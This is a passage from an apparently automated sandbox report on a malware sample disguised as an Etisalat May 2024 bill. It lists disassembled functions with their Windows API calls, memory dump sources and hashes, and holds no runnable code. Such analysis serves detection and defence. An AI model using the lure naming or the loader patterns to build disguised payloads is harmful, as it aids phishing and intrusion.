                                      • Opcode Fuzzy Hash: b256f48d3afd1f94a992596f847a211b587fb486a2dbc1cf145b26b9d3b57769
                                      • Instruction Fuzzy Hash: 9A21BF32540259AFDF21CEA4CC86FEA3BA9EF48714F110294FE156B1D0DBB1AC518BA0
                                      Function 00BE6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BE6FAA
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BE6FBA
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BE6FDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 8d83b159cb473130fb78b3d39e31d98cbedded185975bea8d3f5812111296aaa
                                      • Instruction ID: 242c83565ed8cf3cba3abcff484cd9a6a424dd199e5e6d04befb6ac352b5b34d
                                      • Opcode Fuzzy Hash: 8d83b159cb473130fb78b3d39e31d98cbedded185975bea8d3f5812111296aaa
                                      • Instruction Fuzzy Hash: EC218E32610158BFDF118F55EC85FAB3BAAEF997A4F018164F9149B190CB71AC518BE0
                                      Function 00BE797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BE79E1
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BE79F6
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BE7A03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: aa337b834fac6f234744e61214d6676962b84e14b52e0a1fda7a40933c53f954
                                      • Instruction ID: 46f014eceeb80f7e7112601bc1a45b8c6edd6a216f49a7b1c3bb0cfff43907cc
                                      • Opcode Fuzzy Hash: aa337b834fac6f234744e61214d6676962b84e14b52e0a1fda7a40933c53f954
                                      • Instruction Fuzzy Hash: 97112372290288BBEF209F71CC05FEB37A9EF89B64F010568FA01A6090D7719811DB60
                                      Function 00B64C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64C2E), ref: 00B64CA3
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B64CB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: c47fe79c07e6f6b40e8c29991453948671405231606e8465dc810fa40e1752d6
                                      • Instruction ID: 085b4b5a8e7bbb9d1f73e361197ae9c3687b49bd79942b4d16903fbd92029d79
                                      • Opcode Fuzzy Hash: c47fe79c07e6f6b40e8c29991453948671405231606e8465dc810fa40e1752d6
                                      • Instruction Fuzzy Hash: F3D01230510B67CFD7205F31D95861676D5EF05751B11C8BD9886DA260DBB4D4C0CA51
                                      Function 00B64D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64CE1,?), ref: 00B64DA2
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64DB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 0187a9951358be34c923e8957b130b833a097e32a67e2f2eeed74a2c2a31ddb0
                                      • Instruction ID: 3b9b4d9258d8d66da938c84582024b93e3cf7569ba37d385e78aaa6e76f9a70f
                                      • Opcode Fuzzy Hash: 0187a9951358be34c923e8957b130b833a097e32a67e2f2eeed74a2c2a31ddb0
                                      • Instruction Fuzzy Hash: 74D01771950B13CFD7209F31D848B9676E4EF09355B11C87ED8C6EA160EBB4D880CA51
                                      Function 00B64D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00B64D2E,?,00B64F4F,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64D6F
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B64D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 863cc048042126a28d187d9802ebc3ed2bed6c9f96a5c62399529421417c90d0
                                      • Instruction ID: 90a010c1714a69ea21730b0bbea0e3f7d850289b1387d1d6d0e65d7fe02de7d6
                                      • Opcode Fuzzy Hash: 863cc048042126a28d187d9802ebc3ed2bed6c9f96a5c62399529421417c90d0
                                      • Instruction Fuzzy Hash: 52D01730910B53CFD7209F35D84876676E8EF15392B11C97E9486EA2A0EB74D880CA51
                                      Function 00BE1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00BE12C1), ref: 00BE1080
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BE1092
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 4bac9584df678c95e8fbf9e629fe4eff34af740f5fcf8cd18f9de4fe39e191fa
                                      • Instruction ID: 8721d3b37225aac7dbd8c5cd2fdc203362ff98f7b56df19ead453447c4d724e4
                                      • Opcode Fuzzy Hash: 4bac9584df678c95e8fbf9e629fe4eff34af740f5fcf8cd18f9de4fe39e191fa
                                      • Instruction Fuzzy Hash: 2BD01230510753CFD7205F35D85866676E4EF45351B11CC7DA485DA150DBB0C8C0CA51
                                      Function 00BD93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BD9009,?,00BEF910), ref: 00BD9403
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BD9415
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: c5da1789a45df22e9cbb72d98832bb8a74ca917a4e9b8f5ec61b675d5eb9487f
                                      • Instruction ID: e18b5d336745b5c583eecaad3dabc357897e549138ea94deb5b6088e30d95a75
                                      • Opcode Fuzzy Hash: c5da1789a45df22e9cbb72d98832bb8a74ca917a4e9b8f5ec61b675d5eb9487f
                                      • Instruction Fuzzy Hash: 35D01734610757CFD7209F31D949657B6E5EF05351B11C87EA486EA661EB70C880CB51
                                      Function 00BA1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: fa963b8814837d94c982e96f257750c2a84348094ef2907e83b0b6cf78b22d6d
                                      • Instruction ID: 7d9c1ec5fbc7480cd5421a413fb2231ebd900380e9c148c3fc1983f1ea69b679
                                      • Opcode Fuzzy Hash: fa963b8814837d94c982e96f257750c2a84348094ef2907e83b0b6cf78b22d6d
                                      • Instruction Fuzzy Hash: 19D012B180C118EACB84AA94DCC48F977FCA705701F9409D2F502D2000F3349B94EB31
                                      Function 00BB76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 56c026bb6ee8419a80c6f15181e3c9ca793598193cb1f411061cd17cf6e6fc5d
                                      • Instruction ID: a862e9e7885137549c96f142d8d00d74bdc14ff59ef41d9753f5d55bc26c64b1
                                      • Opcode Fuzzy Hash: 56c026bb6ee8419a80c6f15181e3c9ca793598193cb1f411061cd17cf6e6fc5d
                                      • Instruction Fuzzy Hash: 8AC13774A44216EFCB14CFA5C884AAEB7F5FF88710B1185D8E845EB251DB70EE81CB90
                                      Function 00BDE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 00BDE3D2
                                      • CharLowerBuffW.USER32(?,?), ref: 00BDE415
                                        • Part of subcall function 00BDDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BDDAD9
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BDE615
                                      • _memmove.LIBCMT ref: 00BDE628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: b69c6551ee0636cb1fc04e39b57a28b43dab546fdad0bf2970274709f7bcc6de
                                      • Instruction ID: 258f9268aa7cc058f4f1464b8dcc0875c43587154ae9ca9c3745a8705f6dad3e
                                      • Opcode Fuzzy Hash: b69c6551ee0636cb1fc04e39b57a28b43dab546fdad0bf2970274709f7bcc6de
                                      • Instruction Fuzzy Hash: 71C14A716083019FC714EF28C49096ABBE4FF88758F1489AEF9999B351E731E905CF82
                                      Function 00BD83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00BD83D8
                                      • CoUninitialize.OLE32 ref: 00BD83E3
                                        • Part of subcall function 00BBDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBDAC5
                                      • VariantInit.OLEAUT32(?), ref: 00BD83EE
                                      • VariantClear.OLEAUT32(?), ref: 00BD86BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 6255d2abbc7265c6a6771cad88a64903e099060295c0a3834b9ce929c683a9b5
                                      • Instruction ID: e23225715cccbdff07f84b15b3719c2ab691375dfc08bb8b17bdd234affb4483
                                      • Opcode Fuzzy Hash: 6255d2abbc7265c6a6771cad88a64903e099060295c0a3834b9ce929c683a9b5
                                      • Instruction Fuzzy Hash: 4EA128752047019FDB10EF54C491B2AB7E4FF88324F188599FA9A9B3A1DB34ED04CB86
                                      Function 00BB7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                      Download Yara Rule
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C32
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C4A
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00BEFB80,000000FF,?,00000000,00000800,00000000,?,00BF2C7C,?), ref: 00BB7C6F
                                      • _memcmp.LIBCMT ref: 00BB7C90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: dd9d19795cb8ec18872d8b9834d6483396448de059a5a36150b11fecc220560c
                                      • Instruction ID: d0500c8202879d2aea7e32da28fa8a3dd52afef701fa1bee6dc2171872a823c6
                                      • Opcode Fuzzy Hash: dd9d19795cb8ec18872d8b9834d6483396448de059a5a36150b11fecc220560c
                                      • Instruction Fuzzy Hash: A481E871A00109EFCB14DF94C994EEEB7F9FF89315F204598E516AB260DB71AE06CB60
                                      Function 00BB6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 7bda873d9f91f4dc2c60c90576ff8bb7bd8b8742d446eea16f380443fe867cad
                                      • Instruction ID: 3879c5e4440fb56a97a983d7a28e95b13a0b54970518a3602f15036dfa4ef41a
                                      • Opcode Fuzzy Hash: 7bda873d9f91f4dc2c60c90576ff8bb7bd8b8742d446eea16f380443fe867cad
                                      • Instruction Fuzzy Hash: 8151B6306543029BDB24AF65D891ABEB3E5EF48310F60889FF556CB691DEB49C40DB11
                                      Function 00BC97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B65045: _fseek.LIBCMT ref: 00B6505D
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AAE
                                        • Part of subcall function 00BC99BE: _wcscmp.LIBCMT ref: 00BC9AC1
                                      • _free.LIBCMT ref: 00BC992C
                                      • _free.LIBCMT ref: 00BC9933
                                      • _free.LIBCMT ref: 00BC999E
                                        • Part of subcall function 00B82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B89C64), ref: 00B82FA9
                                        • Part of subcall function 00B82F95: GetLastError.KERNEL32(00000000,?,00B89C64), ref: 00B82FBB
                                      • _free.LIBCMT ref: 00BC99A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                      • Instruction ID: 27424d84e0cd1cfb317f8eff81ea24848b1ae09b5b51255ce9b84df798434b93
                                      • Opcode Fuzzy Hash: d9ae0c5d453641694606f69828c3ed73b5fd5779769f00272cc49afe01aba135
                                      • Instruction Fuzzy Hash: FC514AB1904218AFDF249F64CC85B9EBBB9EF48310F1004EEB609A7251DB755A90CF58
                                      Function 00BE9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(0164E7E8,?), ref: 00BE9AD2
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00BE9B05
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BE9B72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: c744642cfcba27be49605e51bc159a038af0fbad7e0c73e1a24aa3bc5821d12d
                                      • Instruction ID: ea03ba7f685299fce8936de5e6008e388d8ba4467c25f322ba335834a0e174ca
                                      • Opcode Fuzzy Hash: c744642cfcba27be49605e51bc159a038af0fbad7e0c73e1a24aa3bc5821d12d
                                      • Instruction Fuzzy Hash: AC513F34A00289EFCF20DF69D880AAE7BF5FF54320F1482A9F8159B2A0D730AD45CB50
                                      Function 00BD6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00BD6CE4
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6CF4
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BD6D58
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: 3b670288df27b654d6e07cf07440b23f0667dd4b5989667be345af4003f02e34
                                      • Instruction ID: 8597e4997e84b45ff1938310cdb0b6d2840f4e2ed8d6e90bfe787f2cab2acb34
